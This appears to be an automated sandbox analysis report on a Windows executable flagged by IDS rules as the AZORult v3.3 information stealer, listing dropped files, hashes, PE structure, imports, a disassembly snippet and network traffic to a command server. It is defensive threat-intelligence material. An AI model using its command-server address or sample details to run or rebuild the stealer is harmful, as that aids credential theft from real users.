                                Preview:EA06..P...)Sy.Fg5.L....6.V..Z..gH..).9."m5.M.ti...H......3.Q&s.4.aQ..f....3..&szT.eW..*.9..m2..........-*.9.fg0.....e2g8...5)..3..&s.,.iF.L.s9.<.y..@.*d.aZ.....`..6.L..I..3.Q&.@.".3.Q&.*..cT....0.....................9..4.Z..qJ..)3i..YJ.. ....S.0.`...IA....T.sP.l&`...6....)..3.RfsZ....fP.(..P.`..6Tp.*.6..r.....8.M.4...m3.](...8...<*.$...W..f......M..9.....k&u....ES.s....F...0..sS..(.9.d...R.C...3...s*0...PP.8`.@....R..L.sC..*.i.H.%.U..*..cU..........Q@...k6.........<T.s...iT.L.39. ...#.3......R.,Y...K..).........E<.Y..j.....:..p.........J@..6.R..Y..aB.L@/Jl.gX.3. .z.J../.`......).Nm1...T...p..M.*...%M...L....X.@..T.kF... VZ..~U.......).i.P.1.V.....6.U.....32..4....v..i.......`*.9.h..3...kD..f.i....Rf.jd.mN....?..IO.V.......T.....@T.6g5.o.'..B.6..&......&...'b.6..f.`*mT...(.ES....4.h..U.0...6.U@..(..V...l ....5R..`......@......M).;D.mR......L.B....*..kJ.....R....SUh...........M..p.*..;...`....L.....[.....YV@. B.m4...n..%W.&.....mB..E..'..6.....%,U..jX....@

                                C:\Users\user\AppData\Local\Temp\lophophorine

                                Download File
                                Process:C:\Users\user\Desktop\4QihT6CwD8.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):114688
                                Entropy (8bit):7.5571746194274345
                                Encrypted:false
                                SSDEEP:3072:Uno4m1CZK3AeE82E6vJGK/gbpXhbHpl+PjocWj0Gh4P:YS1CyAeEvE6SlJoock0Ge
                                MD5:E2926273F63A3E7C2B2E0DD3C11AF2C4
                                SHA1:EBDC1AF8F5D326A82EB6F5EBF6DEE06B92FBB74D
                                SHA-256:50EF3F65A8BCC0767D6E85C4546811D1CD71FE0E75F69F0CACFAD4F1508560EE
                                SHA-512:534B3ADD2667E46C21FC7B7D54C164BB90090417509E65FBD29D8819466F413200DEB98F68501E1F45D96636493A9B60AF36CCBB061ABFEBF6D1C989655E7F8D
                                Malicious:false
                                Preview:...IDFN0SHZK..E9.HSIFFN0.HOKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG1E9.XSGY.G.v.T..... ::f6<_0:4&g]0J;h1,f4;^w=;/"Ben&&`{KLj.WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9..SI.GK0N..aG0E9OHSI.F..\IWRG.D9OlSIFFN0..TKG E9O.RIFF.0WXUKG2E9KHSIFFN0SHUKG0E9OHQIFBN0WHUKE0E9OHCIF.N0WHEKG E9OHSIVFN0WHUKG0E9O.RI.AN0WHUKG0E9OHSIFFN0WHUKG0E9O.RI.UN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0....G0E9..RIFVN0W.TKG4E9OHSIFFN0WHUKg0EY....FFN0;NUKG.D9O@SIF.O0WHUKG0E9OHSI.FN....KG0E9.@SIF.O0WHUKG.D9OHSIFFN0WHUKG0E.a!7(2'N0.OUKG.D9O@SIF.O0WHUKG0E9OHSI.FN.y:0'(SE9.[SIF.O0W\UKG.D9OHSIFFN0WHUK.0EiOHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFVL0WHUKG.D9OHSIFFN0WHUK.0EiOHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0WHUKG0E9OHSIFFN0

                                C:\Users\user\AppData\Local\Temp\orographically

                                Download File
                                Process:C:\Users\user\Desktop\4QihT6CwD8.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:dropped
                                Size (bytes):86022
                                Entropy (8bit):4.178926076512446
                                Encrypted:false
                                SSDEEP:1536:w7WJw3r9a5U2nzPA7onaU2uRiFTvd3nW1:wKJw4U8z+onPMxRnS
                                MD5:7ED3DAA45FC0D65873FC7B59CF7D7325
                                SHA1:82F43A46F9BDC74AFEB571E2B5D24DFDCBC27EE7
                                SHA-256:682BD94DC4091CEC511E71B0CAFC18DE3BA6A0871E2152A93B93F7CBDB84C71C
                                SHA-512:7C8C2EB0DC12510B35A395CC52AFAEA9BE4D5C951C756A78D51BD111B8FBD4EF0D990816FB8CECDEC3B87EFBA7100C982B1033922350741F173CA73CB39139DB
                                Malicious:false
                                Preview:30J78Q35N35Q38Z62Z65T63H38M31H65B63F63T63U30N32J30D30F30Q30N35K36U35P37J62W38V36C62G30A30G30J30T30Y30E36E36L38U39R34A35X38E34F62C39O36E35E30Q30L30Z30L30U30L36U36N38D39F34D64Q38D36D62U61T37W32G30G30I30K30D30Y30V36D36D38Q39L35X35A38J38I62N38J36Y65B30J30S30Y30K30I30U36A36Q38J39P34D35B38N61Z62B39B36I35R30Q30Y30B30L30F30B36S36D38G39F34X64L38K63J62R61I36E63I30E30K30N30K30B30P36C36D38W39O35Z35U38D65S62A38J33U33P30M30S30O30W30K30F36A36N38P39S34G35Y39O30K62U39Y33C32F30Y30R30C30J30U30C36G36S38I39C34V64R39C32V62P61U32Z65P30D30A30O30E30E30T36L36M38B39X35E35S39Z34T62Y38H36Q34D30B30A30W30P30H30M36K36K38L39X34J35N39O36K62O39P36E63U30K30C30N30F30S30Q36R36U38N39H34G64H39R38T62B61G36M63X30C30Q30R30C30N30K36B36X38L39D35B35W39S61A33U33H63C30D36H36Y38L39M34X35Y39K63E62W39V36J65F30W30Q30A30G30C30T36X36N38E39F38M64T34J34Z66J66F66T66F66S66F62I61O37M34X30K30M30W30A30Z30V36W36Z38L39D39T35D34G36V66H66T66I66L66N66E62A38O36O34D30B30B30E30L30Z30U36B36E38D39Q38M35M34N38F66A66M66Q66I66X66S62D39I36O63G30V30L30F30S30F3

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.402619459755672
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:4QihT6CwD8.exe
                                File size:1'223'168 bytes
                                MD5:45da35e12be2e8a17e6acf41f682c7f9
                                SHA1:cdaccd6ed6bbc405666a5d06a9001d116153f56b
                                SHA256:4a0dc5e1271e90a5fa81a2b042bb1b6f3eaef6159a8a3b07c563a8ca90fa7a74
                                SHA512:d6217abfd71bbe8e84a963a8cb399048f19f3a43aa8b820c2771502c6b4ff790458f22ef1e6c5d00bacd2ccf783da606d0b987169b1281b01dd920f5ad12d493
                                SSDEEP:24576:SqDEvCTbMWu7rQYlBQcBiT6rprG8aiQi9co:STvC/MTQYxsWR7aiQiC
                                TLSH:F0458D0273819022FFDBB1324F56E63157786D2A0523A51F13F81D7BBABC163563E6A2
                                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                File Icon

                                Icon Hash:0148d03032d9cc13

                                Static PE Info

                                General

                                Entrypoint:0x420577
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66C8C3C5 [Fri Aug 23 17:15:49 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:948cc502fe9226992dce9417f952fce3

                                Entrypoint Preview

                                Instruction
                                call 00007F6018906C63h
                                jmp 00007F601890656Fh
                                push ebp
                                mov ebp, esp
                                push esi
                                push dword ptr [ebp+08h]
                                mov esi, ecx
                                call 00007F601890674Dh
                                mov dword ptr [esi], 0049FDF0h
                                mov eax, esi
                                pop esi
                                pop ebp
                                retn 0004h
                                and dword ptr [ecx+04h], 00000000h
                                mov eax, ecx
                                and dword ptr [ecx+08h], 00000000h
                                mov dword ptr [ecx+04h], 0049FDF8h
                                mov dword ptr [ecx], 0049FDF0h
                                ret
                                push ebp
                                mov ebp, esp
                                push esi
                                push dword ptr [ebp+08h]
                                mov esi, ecx
                                call 00007F601890671Ah
                                mov dword ptr [esi], 0049FE0Ch
                                mov eax, esi
                                pop esi
                                pop ebp
                                retn 0004h
                                and dword ptr [ecx+04h], 00000000h
                                mov eax, ecx
                                and dword ptr [ecx+08h], 00000000h
                                mov dword ptr [ecx+04h], 0049FE14h
                                mov dword ptr [ecx], 0049FE0Ch
                                ret
                                push ebp
                                mov ebp, esp
                                push esi
                                mov esi, ecx
                                lea eax, dword ptr [esi+04h]
                                mov dword ptr [esi], 0049FDD0h
                                and dword ptr [eax], 00000000h
                                and dword ptr [eax+04h], 00000000h
                                push eax
                                mov eax, dword ptr [ebp+08h]
                                add eax, 04h
                                push eax
                                call 00007F601890930Dh
                                pop ecx
                                pop ecx
                                mov eax, esi
                                pop esi
                                pop ebp
                                retn 0004h
                                lea eax, dword ptr [ecx+04h]
                                mov dword ptr [ecx], 0049FDD0h
                                push eax
                                call 00007F6018909358h
                                pop ecx
                                ret
                                push ebp
                                mov ebp, esp
                                push esi
                                mov esi, ecx
                                lea eax, dword ptr [esi+04h]
                                mov dword ptr [esi], 0049FDD0h
                                push eax
                                call 00007F6018909341h
                                test byte ptr [ebp+08h], 00000001h
                                pop ecx

                                Rich Headers

                                Programming Language:
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x53fb4.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1280000x7594.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0xd40000x53fb40x54000d8a09f98fcc5684249161e13cc573396False0.5308983212425595data5.457327281516183IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x1280000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0xd46080x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                RT_ICON0xd47300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                RT_ICON0xd48580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                RT_ICON0xd49800x2fcbPNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9289742541888026
                                RT_ICON0xd794c0x1530PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.971976401179941
                                RT_ICON0xd8e7c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.04035549509050041
                                RT_ICON0xe96a40x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.05344755097750683
                                RT_ICON0xf2b4c0x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.06903881700554529
                                RT_ICON0xf7fd40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.06672177609825225
                                RT_ICON0xfc1fc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.09647302904564316
                                RT_ICON0xfe7a40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.11303939962476547
                                RT_ICON0xff84c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishGreat Britain0.16024590163934427
                                RT_ICON0x1001d40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.18882978723404256
                                RT_MENU0x10063c0x50dataEnglishGreat Britain0.9
                                RT_STRING0x10068c0x594dataEnglishGreat Britain0.3333333333333333
                                RT_STRING0x100c200x68adataEnglishGreat Britain0.2735961768219833
                                RT_STRING0x1012ac0x490dataEnglishGreat Britain0.3715753424657534
                                RT_STRING0x10173c0x5fcdataEnglishGreat Britain0.3087467362924282
                                RT_STRING0x101d380x65cdataEnglishGreat Britain0.34336609336609336
                                RT_STRING0x1023940x466dataEnglishGreat Britain0.3605683836589698
                                RT_STRING0x1027fc0x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                RT_RCDATA0x1029540x25092data1.000369154504344
                                RT_GROUP_ICON0x1279e80x92dataEnglishGreat Britain0.7054794520547946
                                RT_GROUP_ICON0x127a7c0x14dataEnglishGreat Britain1.25
                                RT_GROUP_ICON0x127a900x14dataEnglishGreat Britain1.15
                                RT_GROUP_ICON0x127aa40x14dataEnglishGreat Britain1.25
                                RT_VERSION0x127ab80x10cdataEnglishGreat Britain0.5970149253731343
                                RT_MANIFEST0x127bc40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                Imports

                                DLLImport
                                WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                PSAPI.DLLGetProcessMemoryInfo
                                IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                UxTheme.dllIsThemeActive
                                KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishGreat Britain

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                2024-08-29T22:46:59.502352+0200TCP2029467ET MALWARE Win32/AZORult V3.3 Client Checkin M1414973080192.168.2.4104.21.2.6
                                2024-08-29T22:47:07.607647+0200TCP2029467ET MALWARE Win32/AZORult V3.3 Client Checkin M1414973180192.168.2.4104.21.2.6
                                2024-08-29T22:46:59.753049+0200TCP2029136ET MALWARE AZORult v3.3 Server Response M118049730104.21.2.6192.168.2.4

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 29, 2024 22:46:57.832087994 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:46:57.837188959 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:57.837275982 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:46:57.837440968 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:46:57.842535019 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.502288103 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.502302885 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.502311945 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.502324104 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.502334118 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.502345085 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.502351999 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:46:59.502358913 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.502386093 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:46:59.502386093 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:46:59.502430916 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.502441883 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.502453089 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.502465963 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:46:59.502485991 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:46:59.507184982 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.507196903 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.507208109 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.507239103 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:46:59.507261992 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:46:59.589075089 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.589090109 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.589099884 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.589198112 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.589250088 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:46:59.589271069 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:46:59.749785900 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.749970913 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:46:59.750056982 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.750067949 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.750073910 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:46:59.750080109 CEST8049730104.21.2.6192.168.2.4
